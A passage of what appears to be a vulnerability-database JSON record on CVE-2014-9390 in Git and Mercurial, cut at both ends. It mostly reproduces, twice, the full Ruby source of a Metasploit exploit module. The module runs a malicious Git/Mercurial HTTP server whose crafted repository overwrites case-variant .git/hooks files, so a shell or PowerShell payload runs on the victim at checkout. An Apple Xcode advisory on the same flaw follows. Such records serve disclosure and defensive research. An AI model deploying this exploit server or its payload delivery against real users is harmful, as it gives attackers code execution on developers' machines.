end\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/git_client_command_exec.rb"}, {"lastseen": "2020-11-28T21:10:39", "description": "This module exploits CVE-2014-9390, which affects Git (versions less than 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial (versions less than 3.2.3) and describes three vulnerabilities. On operating systems which have case-insensitive file systems, like Windows and OS X, Git clients can be convinced to retrieve and overwrite sensitive configuration files in the .git directory which can allow arbitrary code execution if a vulnerable client can be convinced to perform certain actions (for example, a checkout) against a malicious Git repository. A second vulnerability with similar characteristics also exists in both Git and Mercurial clients, on HFS+ file systems (Mac OS X) only, where certain Unicode codepoints are ignorable. The third vulnerability with similar characteristics only affects Mercurial clients on Windows, where Windows \"short names\" (MS-DOS-compatible 8.3 format) are supported. Today this module only truly supports the first vulnerability (Git clients on case-insensitive file systems) but has the functionality to support the remaining two with a little work.\n", "published": "2015-01-01T19:03:17", "type": "metasploit", "title": "Malicious Git and Mercurial HTTP Server For CVE-2014-9390", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-9390"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/HTTP/GIT_CLIENT_COMMAND_EXEC/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::Git\n include Msf::Exploit::Powershell\n\n def initialize(info = {})\n super(update_info(\n info,\n 'Name' => 'Malicious Git and Mercurial HTTP Server For CVE-2014-9390',\n 'Description' => %q(\n This module exploits CVE-2014-9390, which affects Git (versions less\n than 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial (versions\n less than 3.2.3) and describes three vulnerabilities.\n\n On operating systems which have case-insensitive file systems, like\n Windows and OS X, Git clients can be convinced to retrieve and\n overwrite sensitive configuration files in the .git\n directory which can allow arbitrary code execution if a vulnerable\n client can be convinced to perform certain actions (for example,\n a checkout) against a malicious Git repository.\n\n A second vulnerability with similar characteristics also exists in both\n Git and Mercurial clients, on HFS+ file systems (Mac OS X) only, where\n certain Unicode codepoints are ignorable.\n\n The third vulnerability with similar characteristics only affects\n Mercurial clients on Windows, where Windows \"short names\"\n (MS-DOS-compatible 8.3 format) are supported.\n\n Today this module only truly supports the first vulnerability (Git\n clients on case-insensitive file systems) but has the functionality to\n support the remaining two with a little work.\n ),\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Jon Hart <jon_hart[at]rapid7.com>' # metasploit module\n ],\n 'References' =>\n [\n ['CVE', '2014-9390'],\n ['URL', 'https://blog.rapid7.com/2015/01/01/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial'],\n ['URL', 'http://git-blame.blogspot.com.es/2014/12/git-1856-195-205-214-and-221-and.html'],\n ['URL', 'http://article.gmane.org/gmane.linux.kernel/1853266'],\n ['URL', 'https://github.com/blog/1938-vulnerability-announced-update-your-git-clients'],\n ['URL', 'https://www.mehmetince.net/one-git-command-may-cause-you-hacked-cve-2014-9390-exploitation-for-shell/'],\n ['URL', 'http://mercurial.selenic.com/wiki/WhatsNew#Mercurial_3.2.3_.282014-12-18.29'],\n ['URL', 'http://selenic.com/repo/hg-stable/rev/c02a05cc6f5e'],\n ['URL', 'http://selenic.com/repo/hg-stable/rev/6dad422ecc5a']\n\n ],\n 'DisclosureDate' => '2014-12-18',\n 'Targets' =>\n [\n [\n 'Automatic',\n {\n 'Platform' => [ 'unix' ],\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'Compat' =>\n {\n 'PayloadType' => 'cmd cmd_bash',\n 'RequiredCmd' => 'generic bash-tcp perl'\n }\n }\n }\n ],\n [\n 'Windows Powershell',\n {\n 'Platform' => [ 'windows' ],\n 'Arch' => [ARCH_X86, ARCH_X64]\n }\n ]\n ],\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('GIT', [true, 'Exploit Git clients', true])\n ]\n )\n\n register_advanced_options(\n [\n OptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty for random)', '']),\n OptString.new('MERCURIAL_URI', [false, 'The URI to use as the malicious Mercurial instance (empty for random)', '']),\n OptString.new('GIT_HOOK', [false, 'The Git hook to use for exploitation', 'post-checkout']),\n OptString.new('MERCURIAL_HOOK', [false, 'The Mercurial hook to use for exploitation', 'update']),\n OptBool.new('MERCURIAL', [false, 'Enable experimental Mercurial support', false])\n ]\n )\n end\n\n def setup\n # the exploit requires that we act enough like a real Mercurial HTTP instance,\n # so we keep a mapping of all of the files and the corresponding data we'll\n # send back along with a trigger file that signifies that the git/mercurial\n # client has fetched the malicious content.\n @repo_data = {\n git: { files: {}, trigger: nil },\n mercurial: { files: {}, trigger: nil }\n }\n\n unless datastore['GIT'] || datastore['MERCURIAL']\n fail_with(Failure::BadConfig, 'Must specify at least one GIT and/or MERCURIAL')\n end\n\n setup_git\n setup_mercurial\n\n super\n end\n\n def setup_git\n return unless datastore['GIT']\n # URI must start with a /\n unless git_uri && git_uri =~ /^\\//\n fail_with(Failure::BadConfig, 'GIT_URI must start with a /')\n end\n # sanity check the malicious hook:\n if datastore['GIT_HOOK'].blank?\n fail_with(Failure::BadConfig, 'GIT_HOOK must not be blank')\n end\n\n # In .git/hooks/ directory, specially named files are shell scripts that\n # are executed when particular events occur. For example, if\n # .git/hooks/post-checkout was an executable shell script, a git client\n # would execute that file every time anything is checked out. There are\n # various other files that can be used to achieve similar goals but related\n # to committing, updating, etc.\n #\n # This vulnerability allows a specially crafted file to bypass Git's\n # blacklist and overwrite the sensitive .git/hooks/ files which can allow\n # arbitrary code execution if a vulnerable Git client can be convinced to\n # interact with a malicious Git repository.\n #\n # This builds a fake git repository using the knowledge from:\n #\n # http://schacon.github.io/gitbook/7_how_git_stores_objects.html\n # http://schacon.github.io/gitbook/7_browsing_git_objects.html\n case target.name\n when 'Automatic'\n full_cmd = \"#!/bin/sh\\n#{payload.encoded}\\n\"\n when 'Windows Powershell'\n psh = cmd_psh_payload(payload.encoded,\n payload_instance.arch.first,\n remove_comspec: true,\n encode_final_payload: true)\n full_cmd = \"#!/bin/sh\\n#{psh}\"\n end\n\n sha1, content = build_object('blob', full_cmd)\n trigger = \"/objects/#{get_path(sha1)}\"\n @repo_data[:git][:trigger] = trigger\n @repo_data[:git][:files][trigger] = content\n # build tree that points to the blob\n sha1, content = build_object('tree', \"100755 #{datastore['GIT_HOOK']}\\0#{[sha1].pack('H*')}\")\n @repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content\n # build a tree that points to the hooks directory in which the hook lives, called hooks\n sha1, content = build_object('tree', \"40000 hooks\\0#{[sha1].pack('H*')}\")\n @repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content\n # build a tree that points to the partially uppercased .git directory in\n # which hooks live\n variants = []\n %w(g G). each do |g|\n %w(i I).each do |i|\n %w(t T).each do |t|\n git = g + i + t\n variants << git unless git.chars.none? { |c| c == c.upcase }\n end\n end\n end\n git_dir = '.' + variants.sample\n sha1, content = build_object('tree', \"40000 #{git_dir}\\0#{[sha1].pack('H*')}\")\n @repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content\n\n if datastore['VERBOSE']\n vprint_status(\"Malicious Git commit of #{git_dir}/#{datastore['GIT_HOOK']} is:\")\n commit.each_line { |l| vprint_status(l.strip) }\n end\n sha1, content = build_object('commit', \"tree #{sha1}\\n#{fake_commit_message}\")\n @repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content\n # build HEAD\n @repo_data[:git][:files]['/HEAD'] = \"ref: refs/heads/master\\n\"\n # lastly, build refs\n @repo_data[:git][:files]['/info/refs'] = \"#{sha1}\\trefs/heads/master\\n\"\n end\n\n def setup_mercurial\n return unless datastore['MERCURIAL']\n # URI must start with a /\n unless mercurial_uri && mercurial_uri =~ /^\\//\n fail_with(Failure::BadConfig, 'MERCURIAL_URI must start with a /')\n end\n # sanity check the malicious hook\n if datastore['MERCURIAL_HOOK'].blank?\n fail_with(Failure::BadConfig, 'MERCURIAL_HOOK must not be blank')\n end\n # we fake the Mercurial HTTP protocol such that we are compliant as possible but\n # also as simple as possible so that we don't have to support all of the protocol\n # complexities. Taken from:\n # http://mercurial.selenic.com/wiki/HttpCommandProtocol\n # http://selenic.com/hg/file/tip/mercurial/wireproto.py\n @repo_data[:mercurial][:files]['?cmd=capabilities'] = 'heads getbundle=HG10UN'\n fake_sha1 = 'e6c39c507d7079cfff4963a01ea3a195b855d814'\n @repo_data[:mercurial][:files]['?cmd=heads'] = \"#{fake_sha1}\\n\"\n # TODO: properly bundle this using the information in http://mercurial.selenic.com/wiki/BundleFormat\n @repo_data[:mercurial][:files][\"?cmd=getbundle&common=#{'0' * 40}&heads=#{fake_sha1}\"] = Zlib::Deflate.deflate(\"HG10UNfoofoofoo\")\n\n # TODO: finish building the fake repository\n end\n\n def exploit\n super\n end\n\n def primer\n # add the git and mercurial URIs as necessary\n if datastore['GIT']\n hardcoded_uripath(git_uri)\n print_status(\"Malicious Git URI is #{URI.parse(get_uri).merge(git_uri)}\")\n end\n if datastore['MERCURIAL']\n hardcoded_uripath(mercurial_uri)\n print_status(\"Malicious Mercurial URI is #{URI.parse(get_uri).merge(mercurial_uri)}\")\n end\n end\n\n # handles routing any request to the mock git, mercurial or simple HTML as necessary\n def on_request_uri(cli, req)\n # if the URI is one of our repositories and the user-agent is that of git/mercurial\n # send back the appropriate data, otherwise just show the HTML version\n if (user_agent = req.headers['User-Agent'])\n if datastore['GIT'] && user_agent =~ /^git\\// && req.uri.start_with?(git_uri)\n do_git(cli, req)\n return\n elsif datastore['MERCURIAL'] && user_agent =~ /^mercurial\\// && req.uri.start_with?(mercurial_uri)\n do_mercurial(cli, req)\n return\n end\n end\n\n do_html(cli, req)\n end\n\n # simulates a Git HTTP server\n def do_git(cli, req)\n # determine if the requested file is something we know how to serve from our\n # fake repository and send it if so\n req_file = URI.parse(req.uri).path.gsub(/^#{git_uri}/, '')\n if @repo_data[:git][:files].key?(req_file)\n vprint_status(\"Sending Git #{req_file}\")\n send_response(cli, @repo_data[:git][:files][req_file])\n if req_file == @repo_data[:git][:trigger]\n vprint_status(\"Trigger!\")\n # Do we need this? If so, how can I update the payload which is in a file which\n # has already been built?\n # regenerate_payload\n handler(cli)\n end\n else\n vprint_status(\"Git #{req_file} doesn't exist\")\n send_not_found(cli)\n end\n end\n\n # simulates an HTTP server with simple HTML content that lists the fake\n # repositories available for cloning\n def do_html(cli, _req)\n resp = create_response\n resp.body = <<HTML\n <html>\n <head><title>Public Repositories</title></head>\n <body>\n <p>Here are our public repositories:</p>\n <ul>\nHTML\n\n if datastore['GIT']\n this_git_uri = URI.parse(get_uri).merge(git_uri)\n resp.body << \"<li><a href=#{git_uri}>Git</a> (clone with `git clone #{this_git_uri}`)</li>\"\n else\n resp.body << \"<li><a>Git</a> (currently offline)</li>\"\n end\n\n if datastore['MERCURIAL']\n this_mercurial_uri = URI.parse(get_uri).merge(mercurial_uri)\n resp.body << \"<li><a href=#{mercurial_uri}>Mercurial</a> (clone with `hg clone #{this_mercurial_uri}`)</li>\"\n else\n resp.body << \"<li><a>Mercurial</a> (currently offline)</li>\"\n end\n resp.body << <<HTML\n </ul>\n </body>\n </html>\nHTML\n\n cli.send_response(resp)\n end\n\n # simulates a Mercurial HTTP server\n def do_mercurial(cli, req)\n # determine if the requested file is something we know how to serve from our\n # fake repository and send it if so\n uri = URI.parse(req.uri)\n req_path = uri.path\n req_path += \"?#{uri.query}\" if uri.query\n req_path.gsub!(/^#{mercurial_uri}/, '')\n if @repo_data[:mercurial][:files].key?(req_path)\n vprint_status(\"Sending Mercurial #{req_path}\")\n send_response(cli, @repo_data[:mercurial][:files][req_path], 'Content-Type' => 'application/mercurial-0.1')\n if req_path == @repo_data[:mercurial][:trigger]\n vprint_status(\"Trigger!\")\n # Do we need this? If so, how can I update the payload which is in a file which\n # has already been built?\n # regenerate_payload\n handler(cli)\n end\n else\n vprint_status(\"Mercurial #{req_path} doesn't exist\")\n send_not_found(cli)\n end\n end\n\n # Returns the value of GIT_URI if not blank, otherwise returns a random .git URI\n def git_uri\n return @git_uri if @git_uri\n if datastore['GIT_URI'].blank?\n @git_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 2).downcase + '.git'\n else\n @git_uri = datastore['GIT_URI']\n end\n end\n\n # Returns the value of MERCURIAL_URI if not blank, otherwise returns a random URI\n def mercurial_uri\n return @mercurial_uri if @mercurial_uri\n if datastore['MERCURIAL_URI'].blank?\n @mercurial_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 6).downcase\n else\n @mercurial_uri = datastore['MERCURIAL_URI']\n end\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/git_client_command_exec.rb"}], "packetstorm": [{"lastseen": "2016-12-05T22:17:45", "description": "", "published": "2015-01-02T00:00:00", "type": "packetstorm", "title": "Malicious Git And Mercurial HTTP Server For CVE-2014-9390", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-9390"], "modified": "2015-01-02T00:00:00", "id": "PACKETSTORM:129784", "href": "https://packetstormsecurity.com/files/129784/Malicious-Git-And-Mercurial-HTTP-Server-For-CVE-2014-9390.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit4 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpServer \ninclude Msf::Exploit::Powershell \n \ndef initialize(info = {}) \nsuper(update_info( \ninfo, \n'Name' => 'Malicious Git and Mercurial HTTP Server For CVE-2014-9390', \n'Description' => %q( \nThis module exploits CVE-2014-9390, which affects Git (versions less \nthan 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial (versions \nless than 3.2.3) and describes three vulnerabilities. \n \nOn operating systems which have case-insensitive file systems, like \nWindows and OS X, Git clients can be convinced to retrieve and \noverwrite sensitive configuration files in the .git \ndirectory which can allow arbitrary code execution if a vulnerable \nclient can be convinced to perform certain actions (for example, \na checkout) against a malicious Git repository. \n \nA second vulnerability with similar characteristics also exists in both \nGit and Mercurial clients, on HFS+ file systems (Mac OS X) only, where \ncertain Unicode codepoints are ignorable. \n \nThe third vulnerability with similar characteristics only affects \nMercurial clients on Windows, where Windows \"short names\" \n(MS-DOS-compatible 8.3 format) are supported. \n \nToday this module only truly supports the first vulnerability (Git \nclients on case-insensitive file systems) but has the functionality to \nsupport the remaining two with a little work. \n), \n'License' => MSF_LICENSE, \n'Author' => [ \n'Jon Hart <jon_hart[at]rapid7.com>' # metasploit module \n], \n'References' => \n[ \n['CVE', '2014-9390'], \n['URL', 'https://community.rapid7.com/community/metasploit/blog/2015/01/01/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial'], \n['URL', 'http://git-blame.blogspot.com.es/2014/12/git-1856-195-205-214-and-221-and.html'], \n['URL', 'http://article.gmane.org/gmane.linux.kernel/1853266'], \n['URL', 'https://github.com/blog/1938-vulnerability-announced-update-your-git-clients'], \n['URL', 'https://www.mehmetince.net/one-git-command-may-cause-you-hacked-cve-2014-9390-exploitation-for-shell/'], \n['URL', 'http://mercurial.selenic.com/wiki/WhatsNew#Mercurial_3.2.3_.282014-12-18.29'], \n['URL', 'http://selenic.com/repo/hg-stable/rev/c02a05cc6f5e'], \n['URL', 'http://selenic.com/repo/hg-stable/rev/6dad422ecc5a'] \n \n], \n'DisclosureDate' => 'Dec 18 2014', \n'Targets' => \n[ \n[ \n'Automatic', \n{ \n'Platform' => [ 'unix' ], \n'Arch' => ARCH_CMD, \n'Payload' => \n{ \n'Compat' => \n{ \n'PayloadType' => 'cmd cmd_bash', \n'RequiredCmd' => 'generic bash-tcp perl bash' \n} \n} \n} \n], \n[ \n'Windows Powershell', \n{ \n'Platform' => [ 'windows' ], \n'Arch' => [ARCH_X86, ARCH_X86_64] \n} \n] \n], \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptBool.new('GIT', [true, 'Exploit Git clients', true]) \n] \n) \n \nregister_advanced_options( \n[ \nOptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty for random)', '']), \nOptString.new('MERCURIAL_URI', [false, 'The URI to use as the malicious Mercurial instance (empty for random)', '']), \nOptString.new('GIT_HOOK', [false, 'The Git hook to use for exploitation', 'post-checkout']), \nOptString.new('MERCURIAL_HOOK', [false, 'The Mercurial hook to use for exploitation', 'update']), \nOptBool.new('MERCURIAL', [false, 'Enable experimental Mercurial support', false]) \n] \n) \nend \n \ndef setup \n# the exploit requires that we act enough like a real Mercurial HTTP instance, \n# so we keep a mapping of all of the files and the corresponding data we'll \n# send back along with a trigger file that signifies that the git/mercurial \n# client has fetched the malicious content. \n@repo_data = { \ngit: { files: {}, trigger: nil }, \nmercurial: { files: {}, trigger: nil } \n} \n \nunless datastore['GIT'] || datastore['MERCURIAL'] \nfail_with(Exploit::Failure::BadConfig, 'Must specify at least one GIT and/or MERCURIAL') \nend \n \nsetup_git \nsetup_mercurial \n \nsuper \nend \n \ndef setup_git \nreturn unless datastore['GIT'] \n# URI must start with a / \nunless git_uri && git_uri =~ /^\\// \nfail_with(Exploit::Failure::BadConfig, 'GIT_URI must start with a /') \nend \n# sanity check the malicious hook: \nif datastore['GIT_HOOK'].blank? \nfail_with(Exploit::Failure::BadConfig, 'GIT_HOOK must not be blank') \nend \n \n# In .git/hooks/ directory, specially named files are shell scripts that \n# are executed when particular events occur. For example, if \n# .git/hooks/post-checkout was an executable shell script, a git client \n# would execute that file every time anything is checked out. There are \n# various other files that can be used to achieve similar goals but related \n# to committing, updating, etc. \n# \n# This vulnerability allows a specially crafted file to bypass Git's \n# blacklist and overwrite the sensitive .git/hooks/ files which can allow \n# arbitrary code execution if a vulnerable Git client can be convinced to \n# interact with a malicious Git repository. \n# \n# This builds a fake git repository using the knowledge from: \n# \n# http://schacon.github.io/gitbook/7_how_git_stores_objects.html \n# http://schacon.github.io/gitbook/7_browsing_git_objects.html \ncase target.name \nwhen 'Automatic' \nfull_cmd = \"#!/bin/sh\\n#{payload.encoded}\\n\" \nwhen 'Windows Powershell' \npsh = cmd_psh_payload(payload.encoded, \npayload_instance.arch.first, \nremove_comspec: true, \nencode_final_payload: true) \nfull_cmd = \"#!/bin/sh\\n#{psh}\" \nend \n \nsha1, content = build_object('blob', full_cmd) \ntrigger = \"/objects/#{get_path(sha1)}\" \n@repo_data[:git][:trigger] = trigger \n@repo_data[:git][:files][trigger] = content \n# build tree that points to the blob \nsha1, content = build_object('tree', \"100755 #{datastore['GIT_HOOK']}\\0#{[sha1].pack('H*')}\") \n@repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content \n# build a tree that points to the hooks directory in which the hook lives, called hooks \nsha1, content = build_object('tree', \"40000 hooks\\0#{[sha1].pack('H*')}\") \n@repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content \n# build a tree that points to the partially uppercased .git directory in \n# which hooks live \nvariants = [] \n%w(g G). each do |g| \n%w(i I).each do |i| \n%w(t T).each do |t| \ngit = g + i + t \nvariants << git unless git.chars.none? { |c| c == c.upcase } \nend \nend \nend \ngit_dir = '.' + variants.sample \nsha1, content = build_object('tree', \"40000 #{git_dir}\\0#{[sha1].pack('H*')}\") \n@repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content \n# build the supposed commit that dropped this file, which has a random user/company \nemail = Rex::Text.rand_mail_address \nfirst, last, company = email.scan(/([^\\.]+)\\.([^\\.]+)@(.*)$/).flatten \nfull_name = \"#{first.capitalize} #{last.capitalize}\" \ntstamp = Time.now.to_i \nauthor_time = rand(tstamp) \ncommit_time = rand(author_time) \ntz_off = rand(10) \ncommit = \"author #{full_name} <#{email}> #{author_time} -0#{tz_off}00\\n\" \\ \n\"committer #{full_name} <#{email}> #{commit_time} -0#{tz_off}00\\n\" \\ \n\"\\n\" \\ \n\"Initial commit to open git repository for #{company}!\\n\" \nif datastore['VERBOSE'] \nvprint_status(\"Malicious Git commit of #{git_dir}/#{datastore['GIT_HOOK']} is:\") \ncommit.each_line { |l| vprint_status(l.strip) } \nend \nsha1, content = build_object('commit', \"tree #{sha1}\\n#{commit}\") \n@repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content \n# build HEAD \n@repo_data[:git][:files]['/HEAD'] = \"ref: refs/heads/master\\n\" \n# lastly, build refs \n@repo_data[:git][:files]['/info/refs'] = \"#{sha1}\\trefs/heads/master\\n\" \nend \n \ndef setup_mercurial \nreturn unless datastore['MERCURIAL'] \n# URI must start with a / \nunless mercurial_uri && mercurial_uri =~ /^\\// \nfail_with(Exploit::Failure::BadConfig, 'MERCURIAL_URI must start with a /') \nend \n# sanity check the malicious hook \nif datastore['MERCURIAL_HOOK'].blank? \nfail_with(Exploit::Failure::BadConfig, 'MERCURIAL_HOOK must not be blank') \nend \n# we fake the Mercurial HTTP protocol such that we are compliant as possible but \n# also as simple as possible so that we don't have to support all of the protocol \n# complexities. Taken from: \n# http://mercurial.selenic.com/wiki/HttpCommandProtocol \n# http://selenic.com/hg/file/tip/mercurial/wireproto.py \n@repo_data[:mercurial][:files]['?cmd=capabilities'] = 'heads getbundle=HG10UN' \nfake_sha1 = 'e6c39c507d7079cfff4963a01ea3a195b855d814' \n@repo_data[:mercurial][:files]['?cmd=heads'] = \"#{fake_sha1}\\n\" \n# TODO: properly bundle this using the information in http://mercurial.selenic.com/wiki/BundleFormat \n@repo_data[:mercurial][:files][\"?cmd=getbundle&common=#{'0' * 40}&heads=#{fake_sha1}\"] = Zlib::Deflate.deflate(\"HG10UNfoofoofoo\") \n \n# TODO: finish building the fake repository \nend \n \n# Build's a Git object \ndef build_object(type, content) \n# taken from http://schacon.github.io/gitbook/7_how_git_stores_objects.html \nheader = \"#{type} #{content.size}\\0\" \nstore = header + content \n[Digest::SHA1.hexdigest(store), Zlib::Deflate.deflate(store)] \nend \n \n# Returns the Git object path name that a file with the provided SHA1 will reside in \ndef get_path(sha1) \nsha1[0...2] + '/' + sha1[2..40] \nend \n \ndef exploit \nsuper \nend \n \ndef primer \n# add the git and mercurial URIs as necessary \nif datastore['GIT'] \nhardcoded_uripath(git_uri) \nprint_status(\"Malicious Git URI is #{URI.parse(get_uri).merge(git_uri)}\") \nend \nif datastore['MERCURIAL'] \nhardcoded_uripath(mercurial_uri) \nprint_status(\"Malicious Mercurial URI is #{URI.parse(get_uri).merge(mercurial_uri)}\") \nend \nend \n \n# handles routing any request to the mock git, mercurial or simple HTML as necessary \ndef on_request_uri(cli, req) \n# if the URI is one of our repositories and the user-agent is that of git/mercurial \n# send back the appropriate data, otherwise just show the HTML version \nif (user_agent = req.headers['User-Agent']) \nif datastore['GIT'] && user_agent =~ /^git\\// && req.uri.start_with?(git_uri) \ndo_git(cli, req) \nreturn \nelsif datastore['MERCURIAL'] && user_agent =~ /^mercurial\\// && req.uri.start_with?(mercurial_uri) \ndo_mercurial(cli, req) \nreturn \nend \nend \n \ndo_html(cli, req) \nend \n \n# simulates a Git HTTP server \ndef do_git(cli, req) \n# determine if the requested file is something we know how to serve from our \n# fake repository and send it if so \nreq_file = URI.parse(req.uri).path.gsub(/^#{git_uri}/, '') \nif @repo_data[:git][:files].key?(req_file) \nvprint_status(\"Sending Git #{req_file}\") \nsend_response(cli, @repo_data[:git][:files][req_file]) \nif req_file == @repo_data[:git][:trigger] \nvprint_status(\"Trigger!\") \n# Do we need this? If so, how can I update the payload which is in a file which \n# has already been built? \n# regenerate_payload \nhandler(cli) \nend \nelse \nvprint_status(\"Git #{req_file} doesn't exist\") \nsend_not_found(cli) \nend \nend \n \n# simulates an HTTP server with simple HTML content that lists the fake \n# repositories available for cloning \ndef do_html(cli, _req) \nresp = create_response \nresp.body = <<HTML \n<html> \n<head><title>Public Repositories</title></head> \n<body> \n<p>Here are our public repositories:</p> \n<ul> \nHTML \n \nif datastore['GIT'] \nthis_git_uri = URI.parse(get_uri).merge(git_uri) \nresp.body << \"<li><a href=#{git_uri}>Git</a> (clone with `git clone #{this_git_uri}`)</li>\" \nelse \nresp.body << \"<li><a>Git</a> (currently offline)</li>\" \nend \n \nif datastore['MERCURIAL'] \nthis_mercurial_uri = URI.parse(get_uri).merge(mercurial_uri) \nresp.body << \"<li><a href=#{mercurial_uri}>Mercurial</a> (clone with `hg clone #{this_mercurial_uri}`)</li>\" \nelse \nresp.body << \"<li><a>Mercurial</a> (currently offline)</li>\" \nend \nresp.body << <<HTML \n</ul> \n</body> \n</html> \nHTML \n \ncli.send_response(resp) \nend \n \n# simulates a Mercurial HTTP server \ndef do_mercurial(cli, req) \n# determine if the requested file is something we know how to serve from our \n# fake repository and send it if so \nuri = URI.parse(req.uri) \nreq_path = uri.path \nreq_path += \"?#{uri.query}\" if uri.query \nreq_path.gsub!(/^#{mercurial_uri}/, '') \nif @repo_data[:mercurial][:files].key?(req_path) \nvprint_status(\"Sending Mercurial #{req_path}\") \nsend_response(cli, @repo_data[:mercurial][:files][req_path], 'Content-Type' => 'application/mercurial-0.1') \nif req_path == @repo_data[:mercurial][:trigger] \nvprint_status(\"Trigger!\") \n# Do we need this? If so, how can I update the payload which is in a file which \n# has already been built? \n# regenerate_payload \nhandler(cli) \nend \nelse \nvprint_status(\"Mercurial #{req_path} doesn't exist\") \nsend_not_found(cli) \nend \nend \n \n# Returns the value of GIT_URI if not blank, otherwise returns a random .git URI \ndef git_uri \nreturn @git_uri if @git_uri \nif datastore['GIT_URI'].blank? \n@git_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 2).downcase + '.git' \nelse \n@git_uri = datastore['GIT_URI'] \nend \nend \n \n# Returns the value of MERCURIAL_URI if not blank, otherwise returns a random URI \ndef mercurial_uri \nreturn @mercurial_uri if @mercurial_uri \nif datastore['MERCURIAL_URI'].blank? \n@mercurial_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 6).downcase \nelse \n@mercurial_uri = datastore['MERCURIAL_URI'] \nend \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/129784/git_client_command_exec.rb.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:56", "bulletinFamily": "software", "cvelist": ["CVE-2014-9390"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nAPPLE-SA-2014-12-18-1 Xcode 6.2 beta 3\r\n\r\nXcode 6.2 beta 3 is now available and addresses the following:\r\n\r\nGit\r\nAvailable for: OS X Mavericks v10.9.4 or later\r\nImpact: Synching with a malicious git repository may allow\r\nunexpected files to be added to the .git folder\r\nDescription: The checks involved in disallowed paths did not account\r\nfor case insensitivity or unicode characters. This issue was\r\naddressed by adding additional checks.\r\nCVE-ID\r\nCVE-2014-9390 : Matt Mackall of Mercurial and Augie Fackler of\r\nMercurial\r\n\r\nXcode 6.2 beta 3 may be obtained from:\r\nhttps://developer.apple.com/xcode/downloads/\r\n\r\nTo check that the Xcode has been updated:\r\n\r\n* Select Xcode in the menu bar\r\n* Select About Xcode\r\n* The version after applying this update will be &quot;6.2 &#40;6C101&#41;&quot;.\r\n\r\nInformation will also be posted to the Apple Security Updates\r\nweb site: https://support.apple.com/kb/HT1222\r\n\r\nThis message is signed with Apple&#39;s Product Security PGP key,\r\nand details are available at:\r\nhttps://www.apple.com/support/security/pgp/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG/MacGPG2 v2.0.22 &#40;Darwin&#41;\r\nComment: GPGTools - http://gpgtools.org\r\n\r\niQIcBAEBAgAGBQJUk1PKAAoJEBcWfLTuOo7t268P/2z353ePUi8rj8332xbzgYsz\r\nJc4kMXnGe1jM2Gx12RuT/v/QIIjfguCSzExXimQriFTIbnkFz8rYDPqSFI0fM2T9\r\n8dbtpED3VnsvGQmAUVCfd9GvtqDvx6ZPW2AKih6ly7XtGtqBZLxssGbZFvXNU4X3\r\nfDbmF0jm8nLQoAcpFvarERmhQQOeMDw2Grf3ynPpMxe2iznAkAR8Asves8sUFh36\r\nALdDyQtW2WhWSUhHN8o31VTD2DgV57VwJ2rL6F9UMHmOu7x5SBAATLaNRD1fQOrR\r\naMmFypeUQR1/6CyTT8E9ReUy5iG4X+Sy52LPB7sovPTLIweaOW1Ru12XEbjhBzR6\r\nZNUMcujQEAWwzaHPBIzDKCcG74QY/JpZzrnwvgvgVZ+nrM2tDtSUbfHmGJGzLDNw\r\nxmE+fn1Ik1p1pSShOUO1/2uU9fM9x/P86Kyp07QG7sOZoJN6Wbn+CM/TGwpLBRRs\r\n4Rj+NxlNph5IWzfLIJqCTu4v8hpM/jIMYjQG69BewXOisZVKw1FVHWIzbxHVIApH\r\nn+Kk4Wc2qhLaLLiPzMaDrwe4i5in8ImDhTUW0WH6Un7xuojvRFvTWLchc/Z7QJ6l\r\n+ExN2msjPf73iHY4c9E4eWNOeIyzrpyyHqrxswnlp844fpDHF9Qc8jVScywMtcc0\r\nqOvKkbiVCkNdEtNdAq0d\r\n=Umq9\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-12-22T00:00:00", "published": "2014-12-22T00:00:00", "id": "SECURITYVULNS:DOC:31505", "href": 